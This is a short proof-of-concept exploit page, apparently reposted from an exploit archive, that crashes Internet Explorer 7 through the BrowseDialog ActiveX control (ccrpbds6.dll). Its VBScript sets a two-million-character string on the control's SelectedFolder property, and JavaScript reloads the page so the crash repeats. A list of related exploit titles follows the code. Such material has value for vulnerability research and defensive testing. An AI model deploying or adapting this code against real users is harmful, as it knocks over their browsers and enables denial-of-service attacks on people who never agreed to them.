<!--
-----------------------------------------------------------------------------------------------------------
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------------------------------------
-->
<html>
<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object>
<script language='vbscript'> argCount = 1 arg1=String(2000000, "A") CCRP_BDc.SelectedFolder = arg1
</script> <script language='javascript'>
document.location.reload()
</script>//http://www.leftworld.net
【BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service】相关文章:
★ Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit
★ MS Internet Explorer (FTP Server Response) DoS Exploit
★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
★ trixbox (langChoice) Local File Inclusion Exploit (connect-back)
★ Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
★ MS Windows (MessageBox) Memory Corruption Local Denial of Service
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit